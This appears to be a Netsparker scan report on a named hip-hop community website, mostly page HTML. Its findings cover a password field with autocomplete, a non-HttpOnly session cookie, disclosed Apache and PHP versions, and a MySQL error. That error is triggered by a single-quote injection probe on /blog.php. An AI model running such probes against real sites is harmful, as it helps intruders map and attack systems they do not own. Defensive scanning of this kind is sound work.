google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div> <div id="main-wrapper"> <!-- LEFT SIDEBAR --> <div id="content-left-wrapper"> <div id="content-left"> <div class="mod-left-wrap"> <div class="mod-left-inner"> <div class="mod-left"> <!-- TAB START --> <div id="tabs"> <!-- tabs --> <ul class="css-tabs"> <li><a href="#">Music</a></li> <li class="first"><a href="#">Video</a></li> <li><a href="#">News</a></li> <li><a href="#">Blog</a></li> <li class="last"><a href="#">Gossip</a></li> </ul><!-- panes --> <div class="css-panes" id="content_area" style="display:none;"> <div class="content-pane"> <div id="video-scroller"> <!-- WILL CHANGE THIS LATER --> <div class="scrollable"> <div class="items"> <!-- AUDIO --> <div id="content"> <p> <a class="contentPopupTrigger" rel="ksKuOSxnvUPwHQSY,audio,1" href="/audio.php?id=ksKuOSxnvUPwHQSY"><img src="/pthumbs/9/200/120/ksKuOSxnvUPwHQSY.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="UKiiBTFmPJWIXVLF,audio,1" href="/audio.php?id=UKiiBTFmPJWIXVLF"><img src="/pthumbs/9/200/120/UKiiBTFmPJWIXVLF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="ynJgNmLTnkTNVRuz,audio,1" href="/audio.php?id=ynJgNmLTnkTNVRuz"><img src="/pthumbs/9/200/120/ynJgNmLTnkTNVRuz.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="Eqh_OfaOtdcGcHxI,audio,1" href="/audio.php?id=Eqh_OfaOtdcGcHxI"><img src="/pthumbs/9/200/120/Eqh_OfaOtdcGcHxI.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="YcAJNvxPlUUdzmsS,audio,1" href="/audio.php?id=YcAJNvxPlUUdzmsS"><img src="/pthumbs/9/200/120/YcAJNvxPlUUdzmsS.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="KVdtjVsEAVEbsuuv,audio,1" href="/audio.php?id=KVdtjVsEAVEbsuuv"><img src="/pthumbs/9/200/120/KVdtjVsEAVEbsuuv.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="UjmVIajLLOCzJOFB,audio,1" href="/audio.php?id=UjmVIajLLOCzJOFB"><img src="/pthumbs/9/200/120/UjmVIajLLOCzJOFB.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="SUVPXKXHygHvUt_k,audio,1" href="/audio.php?id=SUVPXKXHygHvUt_k"><img src="/pthumbs/9/200/120/SUVPXKXHygHvUt_k.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="tXIPXdPiKOjaYOMF,audio,1" href="/audio.php?id=tXIPXdPiKOjaYOMF"><img src="/pthumbs/9/200/120/tXIPXdPiKOjaYOMF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="jtPTCIaFEcbfBfkH,audio,1" href="/audio.php?id=jtPTCIaFEcbfBfkH"><img src="/pthumbs/9/200/120/jtPTCIaFEcbfBfkH.jpg" width="200" height="120"></a> </div> <div id="content"> <p> <a class="contentPopupTrigger" rel="oXlAzoMydaxVxPsi,audio,1" href="/audio.php?id=oXlAzoMydaxVxPsi"><img src="/pthumbs/9/200/120/oXlAzoMydaxVxPsi.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="lDn_yFUwCFPgzFPF,audio,1" href="/audio.php?id=lDn_yFUwCFPgzFPF"><img src="/pthumbs/9/200/120/lDn_yFUwCFPgzFPF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="tNCduMYDYGiPNzza,audio,1" href="/audio.php?id=tNCduMYDYGiPNzza"><img src="/pthumbs/9/200/120/tNCduMYDYGiPNzza.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="cnQhvUBXeuDNoGHD,audio,1" href="/audio.php?id=cnQhvUBXeuDNoGHD"><img src="/pthumbs/9/200/120/cnQhvUBXeuDNoGHD.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="sAhehnZkcrXUNCIO,audio,1" href="/audio.php?id=sAhehnZkcrXUNCIO"><img src="/pthumbs/9/200/120/sAhehnZkcrXUNCIO.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="gqhCOJfUcPtNRwGP,audio,1" href="/audio.php?id=gqhCOJfUcPtNRwGP"><img src="/pthumbs/9/200/120/gqhCOJfUcPtNRwGP.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="Xqqh_RCxQaOHmPRR,audio,1" href="/audio.php?id=Xqqh_RCxQaOHmPRR"><img src="/pthumbs/9/200/120/Xqqh_RCxQaOHmPRR.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="PGonkLBvxZAsSlaj,audio,1" href="/audio.php?id=PGonkLBvxZAsSlaj"><img src="/pthumbs/9/200/120/PGonkLBvxZAsSlaj.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="CDzgZsPtTxCqtoNJ,audio,1" href="/audio.php?id=CDzgZsPtTxCqtoNJ"><img src="/pthumbs/9/200/120/CDzgZsPtTxCqtoNJ.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="rAEcIHRFKVyIJRBL,audio,1" href="/audio.php?id=rAEcIHRFKVyIJRBL"><img src="/pthumbs/9/200/120/rAEcIHRFKVyIJRBL.jpg" width="200" height="120"></a> </div> </div> </div> <!-- "previous page" action --><a class="prev browse left"></a> <!-- "next page" action --> <a class="next browse right"></a><br clear="all"> </div> </div> <div class="content-pane"> <div id="video-scroller"> <div class="scrollable"> <div class="items"> <!-- VIDEOS --> <div id="content"> <p> <a class="contentPopupTrigger" rel="_gAXHKitOXPoeGXq,video,2" href="/video.php?id=_gAXHKitOXPoeGXq"><img src="data/preview/_gAXHKitOXPoeGXq.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="tjEdiUqVBKbsqsHL,video,2" href="/video.php?id=tjEdiUqVBKbsqsHL"><img src="data/preview/tjEdiUqVBKbsqsHL.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="yttkYxhUFrdBEoVu,video,2" href="/video.php?id=yttkYxhUFrdBEoVu"><img src="animations/yttkYxhUFrdBEoVu.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="4531_1765,video,3" href="/video.php?id=4531_1765&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/4531_1765.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="iCeCoCYuCXdoTTbr,video,2" href="/video.php?id=iCeCoCYuCXdoTTbr"><img src="data/preview/iCeCoCYuCXdoTTbr.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="NZjCtOyxf_ZKOXPN,video,2" href="/video.php?id=NZjCtOyxf_ZKOXPN"><img src="data/preview/NZjCtOyxf_ZKOXPN.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="zaoRYgWXPLJNQksD,video,2" href="/video.php?id=zaoRYgWXPLJNQksD"><img src="data/preview/zaoRYgWXPLJNQksD.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="JJxEPuEXdtCDFPYf,video,2" href="/video.php?id=JJxEPuEXdtCDFPYf"><img src="data/preview/JJxEPuEXdtCDFPYf.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="ZDmDsXSfZJQMYeCG,video,2" href="/video.php?id=ZDmDsXSfZJQMYeCG"><img src="data/preview/ZDmDsXSfZJQMYeCG.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="9807_1764,video,3" href="/video.php?id=9807_1764&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/9807_1764.jpg" width="200" height="120"></a> </div> <div id="content"> <p> <a class="contentPopupTrigger" rel="eCjxuA_zRuMIBGVx,video,2" href="/video.php?id=eCjxuA_zRuMIBGVx"><img src="animations/eCjxuA_zRuMIBGVx.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="wPPVwkTczcTVZvWs,video,2" href="/video.php?id=wPPVwkTczcTVZvWs"><img src="animations/wPPVwkTczcTVZvWs.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="uybURvIIlnbRiAOG,video,2" href="/video.php?id=uybURvIIlnbRiAOG"><img src="animations/uybURvIIlnbRiAOG.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="sCydNEHmz_TlihNO,video,2" href="/video.php?id=sCydNEHmz_TlihNO"><img src="animations/sCydNEHmz_TlihNO.gif" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="19064_1763,video,3" href="/video.php?id=19064_1763&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/19064_1763.jpg" width="200" height="120"..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /

/ CONFIRMED

http://www.thatshiphop.com/

Identified Field Name

login_password

Request

GET / HTTP/1.1
Referer: http://www.thatshiphop.com/blog.php'
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; path=/; domain=thatshiphop.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community"> <meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!"> <meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" /> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6"> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10"> <link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26"> <link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33"> <script src="js/jquery.min.js" type="text/javascript"></script> <script src="js/jquery.tools.min.js" type="text/javascript"></script> <script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script> <script src="js/jquery.mousewheel.min.js" type="text/javascript"></script> <script src="js/jquery.jscrollpane.min.js" type="text/javascript"></script> <script src="js/home.js" type="text/javascript"></script> <link rel="stylesheet" type="text/css" href="css/style.css"> <link rel="stylesheet" type="text/css" href="css/jscrollpane.css"> <!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]--> <title>ThatsHiphop.com</title></head><body> <div id="page"> <div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div> <div id="main-wrapper"> <!-- LEFT SIDEBAR --> <div id="content-left-wrapper"> <div id="content-left"> <div class="mod-left-wrap"> <div class="mod-left-inner"> <div class="mod-left"> <!-- TAB START --> <div id="tabs"> <!-- tabs --> <ul class="css-tabs"> <li><a href="#">Music</a></li> <li class="first"><a href="#">Video</a></li> <li><a href="#">News</a></li> <li><a href="#">Blog</a></li> <li class="last"><a href="#">Gossip</a></li> </ul><!-- panes --> <div class="css-panes" id="content_area" style="display:none;"> <div class="content-pane"> <div id="video-scroller"> <!-- WILL CHANGE THIS LATER --> <div class="scrollable"> <div class="items"> <!-- AUDIO --> <div id="content"> <p> <a class="contentPopupTrigger" rel="ksKuOSxnvUPwHQSY,audio,1" href="/audio.php?id=ksKuOSxnvUPwHQSY"><img src="/pthumbs/9/200/120/ksKuOSxnvUPwHQSY.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="UKiiBTFmPJWIXVLF,audio,1" href="/audio.php?id=UKiiBTFmPJWIXVLF"><img src="/pthumbs/9/200/120/UKiiBTFmPJWIXVLF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="ynJgNmLTnkTNVRuz,audio,1" href="/audio.php?id=ynJgNmLTnkTNVRuz"><img src="/pthumbs/9/200/120/ynJgNmLTnkTNVRuz.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="Eqh_OfaOtdcGcHxI,audio,1" href="/audio.php?id=Eqh_OfaOtdcGcHxI"><img src="/pthumbs/9/200/120/Eqh_OfaOtdcGcHxI.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="YcAJNvxPlUUdzmsS,audio,1" href="/audio.php?id=YcAJNvxPlUUdzmsS"><img src="/pthumbs/9/200/120/YcAJNvxPlUUdzmsS.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="KVdtjVsEAVEbsuuv,audio,1" href="/audio.php?id=KVdtjVsEAVEbsuuv"><img src="/pthumbs/9/200/120/KVdtjVsEAVEbsuuv.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="UjmVIajLLOCzJOFB,audio,1" href="/audio.php?id=UjmVIajLLOCzJOFB"><img src="/pthumbs/9/200/120/UjmVIajLLOCzJOFB.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="SUVPXKXHygHvUt_k,audio,1" href="/audio.php?id=SUVPXKXHygHvUt_k"><img src="/pthumbs/9/200/120/SUVPXKXHygHvUt_k.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="tXIPXdPiKOjaYOMF,audio,1" href="/audio.php?id=tXIPXdPiKOjaYOMF"><img src="/pthumbs/9/200/120/tXIPXdPiKOjaYOMF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="jtPTCIaFEcbfBfkH,audio,1" href="/audio.php?id=jtPTCIaFEcbfBfkH"><img src="/pthumbs/9/200/120/jtPTCIaFEcbfBfkH.jpg" width="200" height="120"></a> </div> <div id="content"> <p> <a class="contentPopupTrigger" rel="oXlAzoMydaxVxPsi,audio,1" href="/audio.php?id=oXlAzoMydaxVxPsi"><img src="/pthumbs/9/200/120/oXlAzoMydaxVxPsi.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="lDn_yFUwCFPgzFPF,audio,1" href="/audio.php?id=lDn_yFUwCFPgzFPF"><img src="/pthumbs/9/200/120/lDn_yFUwCFPgzFPF.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="tNCduMYDYGiPNzza,audio,1" href="/audio.php?id=tNCduMYDYGiPNzza"><img src="/pthumbs/9/200/120/tNCduMYDYGiPNzza.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="cnQhvUBXeuDNoGHD,audio,1" href="/audio.php?id=cnQhvUBXeuDNoGHD"><img src="/pthumbs/9/200/120/cnQhvUBXeuDNoGHD.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="sAhehnZkcrXUNCIO,audio,1" href="/audio.php?id=sAhehnZkcrXUNCIO"><img src="/pthumbs/9/200/120/sAhehnZkcrXUNCIO.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="gqhCOJfUcPtNRwGP,audio,1" href="/audio.php?id=gqhCOJfUcPtNRwGP"><img src="/pthumbs/9/200/120/gqhCOJfUcPtNRwGP.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="Xqqh_RCxQaOHmPRR,audio,1" href="/audio.php?id=Xqqh_RCxQaOHmPRR"><img src="/pthumbs/9/200/120/Xqqh_RCxQaOHmPRR.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="PGonkLBvxZAsSlaj,audio,1" href="/audio.php?id=PGonkLBvxZAsSlaj"><img src="/pthumbs/9/200/120/PGonkLBvxZAsSlaj.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="CDzgZsPtTxCqtoNJ,audio,1" href="/audio.php?id=CDzgZsPtTxCqtoNJ"><img src="/pthumbs/9/200/120/CDzgZsPtTxCqtoNJ.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="rAEcIHRFKVyIJRBL,audio,1" href="/audio.php?id=rAEcIHRFKVyIJRBL"><img src="/pthumbs/9/200/120/rAEcIHRFKVyIJRBL.jpg" width="200" height="120"></a> </div> </div> </div> <!-- "previous page" action --><a class="prev browse left"></a> <!-- "next page" action --> <a class="next browse right"></a><br clear="all"> </div> </div> <div class="content-pane"> <div id="video-scroller"> <div class="scrollable"> <div class="items"> <!-- VIDEOS --> <div id="content"> <p> <a class="contentPopupTrigger" rel="_gAXHKitOXPoeGXq,video,2" href="/video.php?id=_gAXHKitOXPoeGXq"><img src="data/preview/_gAXHKitOXPoeGXq.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="tjEdiUqVBKbsqsHL,video,2" href="/video.php?id=tjEdiUqVBKbsqsHL"><img src="data/preview/tjEdiUqVBKbsqsHL.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="yttkYxhUFrdBEoVu,video,2" href="/video.php?id=yttkYxhUFrdBEoVu"><img src="animations/yttkYxhUFrdBEoVu.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="4531_1765,video,3" href="/video.php?id=4531_1765&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/4531_1765.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="iCeCoCYuCXdoTTbr,video,2" href="/video.php?id=iCeCoCYuCXdoTTbr"><img src="data/preview/iCeCoCYuCXdoTTbr.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="NZjCtOyxf_ZKOXPN,video,2" href="/video.php?id=NZjCtOyxf_ZKOXPN"><img src="data/preview/NZjCtOyxf_ZKOXPN.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="zaoRYgWXPLJNQksD,video,2" href="/video.php?id=zaoRYgWXPLJNQksD"><img src="data/preview/zaoRYgWXPLJNQksD.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="JJxEPuEXdtCDFPYf,video,2" href="/video.php?id=JJxEPuEXdtCDFPYf"><img src="data/preview/JJxEPuEXdtCDFPYf.jpg" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="ZDmDsXSfZJQMYeCG,video,2" href="/video.php?id=ZDmDsXSfZJQMYeCG"><img src="data/preview/ZDmDsXSfZJQMYeCG.jpg" width="200" height="120"></a> <a class="contentPopupTrigger" rel="9807_1764,video,3" href="/video.php?id=9807_1764&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/9807_1764.jpg" width="200" height="120"></a> </div> <div id="content"> <p> <a class="contentPopupTrigger" rel="eCjxuA_zRuMIBGVx,video,2" href="/video.php?id=eCjxuA_zRuMIBGVx"><img src="animations/eCjxuA_zRuMIBGVx.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="wPPVwkTczcTVZvWs,video,2" href="/video.php?id=wPPVwkTczcTVZvWs"><img src="animations/wPPVwkTczcTVZvWs.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="uybURvIIlnbRiAOG,video,2" href="/video.php?id=uybURvIIlnbRiAOG"><img src="animations/uybURvIIlnbRiAOG.gif" width="200" height="120"></a> <a class="contentPopupTrigger" rel="sCydNEHmz_TlihNO,video,2" href="/video.php?id=sCydNEHmz_TlihNO"><img src="animations/sCydNEHmz_TlihNO.gif" width="200" height="120"></a> </p><p> <a class="contentPopupTrigger" rel="19064_1763,video,3" href="/video.php?id=19064_1763&lh=1"><img src="http://www.thatshiphop.com/data/uservideos/thumbs/19064_1763.jpg" width="200" height="120"..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /blog.php

/blog.php CONFIRMED

http://www.thatshiphop.com/blog.php

Identified Cookie

PHPSESSID

Request

GET /blog.php HTTP/1.1
Referer: http://www.thatshiphop.com/blog.php'
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=c64852c6f9eba865a11f66887402f907; path=/; domain=thatshiphop.com
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /blog.php

/blog.php

http://www.thatshiphop.com/blog.php

Extracted Version

Apache/2.2.14 (Unix)

Request

GET /blog.php HTTP/1.1
Referer: http://www.thatshiphop.com/blog.php'
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=c64852c6f9eba865a11f66887402f907; path=/; domain=thatshiphop.com
Content-Length: 0
Content-Type: text/html; charset=UTF-8


PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /blog.php

/blog.php

http://www.thatshiphop.com/blog.php

Extracted Version

PHP/5.2.14

Request

GET /blog.php HTTP/1.1
Referer: http://www.thatshiphop.com/blog.php'
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=c64852c6f9eba865a11f66887402f907; path=/; domain=thatshiphop.com
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /blog.php'

/blog.php'

http://www.thatshiphop.com/blog.php'

Request

GET /blog.php' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:09:31 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 157
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''blog.php''' at line 1